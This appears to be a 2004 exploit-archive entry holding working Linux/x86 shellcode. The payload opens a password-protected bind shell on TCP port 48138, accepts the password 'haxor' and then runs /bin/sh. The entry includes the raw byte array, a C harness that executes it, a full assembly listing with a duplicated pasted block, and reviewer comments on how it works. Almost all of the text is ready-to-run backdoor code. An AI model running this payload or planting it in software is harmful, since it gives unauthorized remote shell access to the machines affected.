Shellcode for binding to port 48138 and requiring a password of haxor.
b47480e34fb41f125be3325034ad0d4d2c62187de7fcf8bb77fcaa62c59817be
/*
*
*
# Private Antisec Productions.
# Greetz to newroot,esdee,rave,gorny, ...
#polygrithm@hotmail
###################
# AUTH-BIND-CODE #
# BY NRAZIZ #
# JAN.04 #
# @nt!s3c-cr3w #
#nraziz@antisec.de#
###################
*
*
*/
/*
* Binds to TCP port 48138 (pushed as 0xabc; the little-endian bytes bc 0a read as 0xbc0a = 48138 in network byte order)
* Password: haxor
*/
/*
 * Linux/x86 bind-shell payload as raw bytes; the assembly listing at the end
 * of the file is the instruction-level view of the same bytes.
 *
 * What the bytes do, per that listing: socket()/bind()/listen()/accept() via
 * the socketcall syscall (int 0x80, eax=0x66) on TCP port 48138; then a loop
 * that send()s the 5-byte prompt "Pass:" on the accepted connection, recv()s
 * 5 bytes into the reused sockaddr buffer and rep cmpsb-compares them with
 * "haxor". A mismatch jumps back to the prompt, so the listener stays up
 * until the compare succeeds; a match dup2()s the connection over fds 0-2,
 * execve()s "/bin//sh" and finally calls exit().
 *
 * Reviewer notes: the descriptor numbers are hard-coded (3 = listening
 * socket, 4 = accepted connection) rather than read back from %eax after the
 * syscalls, so the payload only works when those are the next free fds. The
 * fixed listener port and the constant "Pass:" banner are the network-visible
 * artefacts. The array lives in writable data; running it (see main) needs an
 * executable data segment, which NX/W^X-enforcing builds do not provide.
 */
char bindcode[]=
"\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x31\xd2\x52\x66\x68\xbc\x0a\x66\x6a\x02\x89\xe2\x6a"
// port ^^ ^^   (pushw $0xabc -> bytes bc 0a -> 48138 in network byte order)
"\x10\x52\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x6a"
"\x02\x6a\x03\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xc9"
"\x51\x51\x6a\x03\x89\xe1\xfe\xc3\xb0\x66\xcd\x80\x31"
"\xdb\x53\x6a\x3a\x68\x50\x61\x73\x73\x89\xe6\x6a\x05"
// "Pass" (push $0x73736150) preceded by ":" and 0 on the stack -> the "Pass:" banner
"\x56\x6a\x04\x89\xe1\xb3\x09\xb0\x66\xcd\x80\x31\xc9"
"\x31\xf6\x51\x6a\x05\x52\x6a\x04\x89\xe1\xb3\x0a\xb0"
"\x66\xcd\x80\x31\xc9\x51\x6a\x72\x68\x68\x61\x78\x6f"
// "haxo" + "r": the 5 bytes the received input is compared against
"\x89\xe7\x89\xd6\x80\xc1\x05\xfc\xf3\xa6\x75\xbf\x31"
"\xc9\xb3\x04\xb0\x3f\xcd\x80\x41\x83\xf9\x03\x75\xf6"
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\xb0"
"\x01\xcd\x80";
/*
 * Test harness: transfers control into the byte string above as if it were a
 * function. Converting a data object to a function pointer and calling it is
 * undefined behaviour in C, and the bytes sit in a writable, normally
 * non-executable segment, so on an NX/W^X-enforcing build this faults before
 * any syscall runs. When the payload does run, it ends with an exit() syscall
 * rather than a ret, so the `return 0` below is not reached.
 */
int main(void)
{
	void (*entry)(void) = (void (*)(void))bindcode;

	entry();
	return 0;
}
/*
********* ASM CODE *************
.section .text
.globl _start
_start:
#socket(2,1,0)
xorl %ebx,%ebx
push %ebx
incl %ebx
push %ebx
push $0x2
movl %esp,%ecx
movb $0x66,%al
int $0x80
#info.sin_addr.saddr=0x0,info.sin_port=0xabc,info.sin_family=2
xorl %edx,%edx
pushl %edx
pushw $0xabc
pushw $0x2
movl %esp,%edx
#bind(sockfd,&info,0x10)
#0x3 is assumed to be the fd returned by socket() (the value in %eax is not saved)
push $0x10
push %edx
push $0x3
movl %esp,%ecx
incb %bl
movb $0x66,%al
int $0x80
#listen(sockfd,2)  (the backlog pushed below is 0x2)
push $0x2
push $0x3
movl %esp,%ecx
movb $0x4,%bl
movb $0x66,%al
int $0x80
#accept(sockfd,0,0)
xorl %ecx,%ecx
push %ecx
push %ecx
push $0x3
movl %esp,%ecx
incb %bl
movb $0x66,%al
int $0x80
again:
#send()
xorl %ebx,%ebx
push %ebx #this is better than some
push $0x3a #stupid [jmp,call] technique :)
push $0x73736150 #"Pass" followed by ":" and 0x0
movl %esp,%esi
push $0x5
push %esi
push $0x4
movl %esp,%ecx
movb $0x9,%bl
movb $0x66,%al
int $0x80
#recv()
xorl %ecx,%ecx
xorl %esi,%esi
push %ecx
push $0x5
push %edx
push $0x4
movl %esp,%ecx
movb $10,%bl
movb $0x66,%al
int $0x80
#comparing da passworz
xorl %ecx,%ecx
push %ecx
push $0x72
push $0x6f786168
movl %esp,%edi
movl %edx,%esi
add $0x5,%cl
cld
rep cmpsb
jnz again
#dup2()'s
xorl %ecx,%ecx
movb $0x4,%bl
loop:
movb $0x3f,%al
int $0x80
incl %ecx
cmpl $0x3,%ecx
jne loop
# NOTE: the twelve lines from this "#execve()" through the second "jne loop"
# below are a paste artefact of this listing: they repeat the execve() preamble
# and the dup2 loop tail, and have no counterpart in the byte string above.
# The real sequence is the dup2 loop above followed by the execve() further down.
#execve()
xorl %eax,%eax
push %eax
push $0x68732f2f
push $0x6e69622f
movl %esp,%ebx
push %eax
movb $0x3f,%al
int $0x80
incl %ecx
cmpl $0x3,%ecx
jne loop
#execve()
xorl %eax,%eax
push %eax
push $0x68732f2f
push $0x6e69622f
movl %esp,%ebx
push %eax
push %ebx
movl %esp,%ecx
xorl %edx,%edx
movb $0xb,%al
int $0x80
#exit()
movb $0x1,%al
int $0x80
******************************************************
*/